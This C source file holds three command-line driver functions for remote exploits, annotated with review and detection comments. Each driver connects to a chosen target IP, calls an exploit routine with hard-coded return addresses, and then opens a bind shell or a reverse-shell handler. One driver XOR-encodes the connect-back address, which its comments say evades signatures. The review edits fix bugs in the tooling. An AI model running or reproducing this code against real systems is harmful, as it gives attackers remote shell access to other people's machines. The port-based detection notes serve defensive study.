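/*
 * Command-line driver for a proof-of-concept with a two-entry target table.
 *
 * Usage: <prog> <ip>
 *
 * Flow, as far as this function shows:
 *   1. argv[1] must pass isip(); otherwise the program exits.
 *   2. The first two entries of target[] (num, ret, name) are listed and the
 *      operator picks one on stdin.
 *   3. A TCP connection is opened to <ip>:PORT and the socket is passed to
 *      exploit() together with the chosen entry's `ret` value.
 *   4. The socket is closed and connect_to_bindshell(<ip>, 4444) is called.
 *
 * Every failure path exits with status 1 (exploit() reports failure by
 * returning 1). Returns 0 once connect_to_bindshell() returns.
 *
 * Review note (detection): the follow-up connection always goes to TCP port
 * 4444 on the same host. A new listener or inbound session on that port
 * shortly after traffic to PORT is the network-visible trace of a run.
 */
int main ( int argc, char* argv[] )
{
    int s;
    int targ = -1;                            /* stays invalid if scanf() reads nothing */
    int i;
    struct sockaddr_in remote_addr = { 0 };   /* no stale stack bytes in the padding */
    struct hostent* host_addr;

    if ( argc != 2 ) {
        printf ( "Usage: %s <ip>\n", argv[0] );
        exit ( 1 );
    }

    /* Cosmetic only; system() runs "clear" through the shell using the caller's PATH. */
    system ( "clear" );
    header ();

    if ( !isip ( argv[1] ) ) {
        printf ( "Invalid Target IP!\n" );
        exit ( 1 );
    }

    printf("--[ select target\n");
    /* The menu and the range check below are both hard-wired to two entries. */
    for ( i = 0; i < 2; i++ )
        printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
    printf ( " >> " );

    /*
     * targ indexes target[] further down, so unparsable input is rejected
     * here as well as out-of-range values (the original read targ
     * uninitialised when scanf() matched nothing).
     */
    if ( scanf ( "%d", &targ ) != 1 || ( targ != 0 && targ != 1 ) ) {
        printf ( "--[ invalid target!\n" );
        exit ( 1 );
    }

    /* NOTE(review): gethostbyname() is obsolescent; getaddrinfo() is the current interface. */
    if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) {
        fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
        exit ( 1 );
    }

    remote_addr.sin_family = AF_INET;
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
    remote_addr.sin_port = htons ( PORT );

    if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) {
        printf ( "socket failed!\n" );
        exit ( 1 );
    }

    printf ( "--[ connecting to %s:%u...", argv[1], PORT );
    /* Size taken from the object actually passed rather than from struct sockaddr. */
    if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof remote_addr ) == -1 ) {
        printf ( "failed!\n" );
        exit ( 1 );
    }
    printf ( "done!\n" );

    if ( exploit ( s, target[targ].ret ) == 1 ) {
        printf ( "exploitation FAILED!\n" );
        exit ( 1 );
    }

    close ( s );
    connect_to_bindshell ( argv[1], 4444 );

    return 0;
}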
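/*
 * Command-line driver that lets the operator choose between two payload
 * modes after connecting to the target.
 *
 * parse_arguments() fills `myargs`; this function reads its fields tip and
 * tport (passed to connect_to_remote_host), target (index into target[]) and
 * lip (passed to exploit() in mode 1).
 *
 * Modes, selected on stdin:
 *   0 ("bind"): exploit() is called with a NULL last argument, then
 *               connect_to_bindshell(myargs.tip, 20000).
 *   1 ("cb"):   exploit() is called with myargs.lip, then
 *               start_reverse_handler(45295).
 *
 * Exits with status 1 if exploit() returns 1 or the selection is invalid;
 * returns 0 otherwise.
 *
 * Review note (detection): the two fixed ports are the observable side of a
 * run. Mode 0 is followed by a connection to TCP port 20000 on the target.
 * In mode 1 the handler is started with 45295, presumably the port the
 * target connects back to (confirm in start_reverse_handler).
 */
int main ( int argc, char* argv[] )
{
    int s;
    int option = -1;   /* falls through to the "invalid" branch if scanf() reads nothing */
    args myargs;

    /* Cosmetic only; system() runs "clear" through the shell using the caller's PATH. */
    system ( "clear" );
    header ();

    parse_arguments ( argc, argv, &myargs );
    /*
     * NOTE(review): neither the returned socket nor myargs.target is checked
     * here; presumably connect_to_remote_host() and parse_arguments() exit
     * on bad input. Confirm, since myargs.target indexes target[] below.
     */
    s = connect_to_remote_host ( myargs.tip, myargs.tport );

    printf ( "--[ select shellcode\n" );
    printf ( " |\n" );
    printf ( " |- [0] bind\n" );
    printf ( " `- [1] cb\n" );
    printf ( ">> " );

    /* The original switched on an uninitialised value when scanf() matched nothing. */
    if ( scanf ( "%d", &option ) != 1 )
        option = -1;

    switch ( option ) {
    case 0:
        printf ( "--[ using bind shellcode\n" );
        if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 ) {
            printf ( "exploitation failed!\n" );
            exit ( 1 );
        }
        connect_to_bindshell ( myargs.tip, 20000 );
        break;

    case 1:
        printf ( "--[ using cb shellcode\n" );
        if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 ) {
            printf ( "exploitation failed!\n" );
            exit ( 1 );
        }
        start_reverse_handler ( 45295 );
        break;

    default:
        printf ( "--[ invalid shellcode!\n" );
        exit ( 1 );
    }

    close ( s );
    return 0;
}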
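/*
 * Command-line driver with two invocation forms:
 *
 *   <prog> <host>                                   bind mode
 *   <prog> <host> <connectback ip> <connectback port>   reverse mode
 *
 * In both forms the host is resolved and a TCP connection is opened to
 * <host>:PORT before exploit() is called.
 *
 *   - Reverse mode (argc == 4): the connect-back address and port are
 *     converted with inet_addr()/htons() and XORed with 0x99999999 / 0x9999
 *     before being passed to exploit() with a final argument of 0. Then
 *     start_reverse_handler(argv[3]) is called.
 *   - Bind mode (argc == 2): exploit() gets zero for both values and a final
 *     argument of 1. Then connect_to_bindshell(<host>, 4444) is called.
 *
 * Exits with status 1 on any failure (exploit() reports failure by
 * returning 1); returns 0 otherwise.
 *
 * Review notes (detection):
 *   - Bind mode is followed by a connection to TCP port 4444 on the target.
 *   - In reverse mode the address and port are XOR-encoded before use. If
 *     exploit() embeds them as given, a signature looking for the literal
 *     connect-back address in the request will not match.
 */
int main ( int argc, char* argv[] )
{
    int s;
    unsigned long xoredip;
    unsigned short xoredcbport;
    struct sockaddr_in remote_addr = { 0 };   /* no stale stack bytes in the padding */
    struct hostent *host_addr;

    if ( argc != 2 && argc != 4 ) {
        fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] );
        exit ( 1 );
    }

    /* NOTE(review): gethostbyname() is obsolescent; getaddrinfo() is the current interface. */
    if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) {
        fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
        exit ( 1 );
    }

    remote_addr.sin_family = AF_INET;
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
    remote_addr.sin_port = htons ( PORT );

    /* Cosmetic only; system() runs "clear" through the shell using the caller's PATH. */
    system ( "clear" );
    header ();

    if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) {
        printf ( "socket failed!\n" );
        exit ( 1 );
    }

    printf ( "--[ connecting to %s:%u...", argv[1], PORT );
    /* Size taken from the object actually passed rather than from struct sockaddr. */
    if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof remote_addr ) == -1 ) {
        printf ( "failed!\n" );
        exit ( 1 );
    }
    printf ( YELLOW "done!\n" NORMAL);

    if ( argc == 4 ) {
        /*
         * NOTE(review): inet_addr() and atoi() give no usable error
         * indication, so malformed arguments are encoded as-is.
         */
        xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
        xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;

        if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 ) {
            printf ( "exploitation FAILED!\n" );
            exit ( 1 );
        }
        start_reverse_handler ( argv[3] );
    } else {
        /*
         * Plain integer zeros; the original cast NULL (a pointer constant)
         * to unsigned long / unsigned short to get the same values.
         */
        if ( exploit ( s, ( unsigned long ) 0, ( unsigned short ) 0, 1 ) == 1 ) {
            printf ( "exploitation FAILED!\n" );
            exit ( 1 );
        }
        connect_to_bindshell ( argv[1], 4444 );
    }

    /* NOTE(review): the socket is not closed on this path; process exit reclaims it. */
    return 0;
}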